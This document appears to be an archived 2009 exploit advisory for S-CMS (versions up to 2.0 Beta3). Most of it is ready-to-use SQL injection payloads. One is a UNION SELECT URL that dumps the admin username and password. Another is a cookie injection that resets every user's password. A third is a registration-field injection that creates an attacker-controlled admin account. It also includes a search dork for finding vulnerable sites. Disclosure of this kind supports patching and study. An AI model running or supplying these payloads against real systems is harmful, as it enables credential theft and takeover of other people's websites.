Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22026
HistoryJun 14, 2009 - 12:00 a.m.

MULTIPLE SQL INJECTION VULNERABILITIES --S-CMS <= v-2.0 Beta3-->

2009-06-1400:00:00
vulners.com
19

MULTIPLE SQL INJECTION VULNERABILITIES --S-CMS <= v-2.0 Beta3–>

CMS INFORMATION:

–>WEB: http://www.matteoiammarrone.com/public/s-cms/
–>DOWNLOAD: http://www.matteoiammarrone.com/public/s-cms/
–>DEMO: N/A
–>CATEGORY: CMS / Portal
–>DESCRIPTION: Cms written in php and mysql, phpnuke style whit a plugins,
blocks and permission system.
–>RELEASED: 2009-05-25

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: "S-CMS by matteoiamma"
–>CATEGORY: SQL INJECTION/INSECURE COOKIE HANDLING (SQLi)/ADD NEW ADMIN (SQLi)
–>AFFECT VERSION: <= 2.0-Beta3
–>Discovered Bug date: 2009-05-25
–>Reported Bug date: 2009-05-25
–>Fixed bug date: 2009-05-28
–>Info patch(2.1): http://www.matteoiammarrone.com/public/s-cms/plugin.php?page=phpbb3
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


PROOF OF CONCEPT:

<<<<---------++++++++++++++ Condition: magic quotes=OFF ++++++++++++++++±-------->>>>

<<<<---------++++++++++++++ Condition: {db_prefix} by default: cms ++++++++++++++++±-------->>>>

[++] GET var –> 'username'

[++] File vuln –> 'profile.php'

http://[HOST]/[PATH]/plugin.php?page=your_account&amp;mode=viewprofile&amp;username=-1&#37;27+UNION+ALL+SELECT+1,user&#40;&#41;,3,version&#40;&#41;,database&#40;&#41;,user&#40;&#41;,7,8,current_user&#40;&#41;,10,11,version&#40;&#41;,13,14,15,version&#40;&#41;,17,version&#40;&#41;,user&#40;&#41;,20,21,22&#37;23


[++[Return]++] ~~~~~&gt; user or version in DB.


----------
EXPLOIT:
----------


~~~~~&gt;
http://[HOST]/[PATH]/plugin.php?page=your_account&amp;mode=viewprofile&amp;username=-1&#37;27+UNION+ALL+SELECT+1,username,3,concat&#40;username,0x3A3A3A,password&#41;,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+cms_users+WHERE+uid=1&#37;23


[++[Return]++] ~~~~~&gt; username:::password in &#39;{db_prefix}_users&#39; table



##################################
/////////////////////////////////

INSECURE COOKIE HANDLING &#40;SQLi&#41;:

/////////////////////////////////
##################################



&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++---------&gt;&gt;&gt;&gt;

&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: Be registered user +++++++++++++++++---------&gt;&gt;&gt;&gt;


Being other user we can change passwords of all users and set our password for them.


----------
EXPLOIT:
----------


Change &#39;username&#39; cookie.


~~~~~&gt; username=[your_real_user]&#39; or 1=1&#37;23 



[++[Return]++] ~~~~~&gt; Set our password for all users.



#######################
//////////////////////

ADD NEW ADMIN &#40;SQLi&#41;:

/////////////////////
######################



&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++---------&gt;&gt;&gt;&gt;



Go to register page ~~~~~&gt; http://[HOST]/[PATH]/plugin.php?page=your_account.php&amp;mode=register


----------
EXPLOIT:
----------


Set username.


~~~~~&gt; username=y3nh4ck3r&#39;,MD5&#40;&#39;y3nh4ck3r&#39;&#41;, &#39;&#39;, &#39;&#39;, &#39;&#39;, &#39;&#39;, &#39;offline&#39;, &#39;[email protected]&#39;, &#39;01.gif&#39;, &#39;&#39;, &#39;&#39;, &#39;&#39;, &#39;1&#39;,
&#39;&#39;, &#39;&#39;, &#39;ip&#39;, &#39;lang-english.php&#39;, &#39;lightstorm&#39;, &#39;&#39;, &#39;admin&#39;, &#39;0&#39;&#41;/*



[++[Return]++] ~~~~~&gt; Create new admin with username/password= y3nh4ck3r/y3nh4ck3r



#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################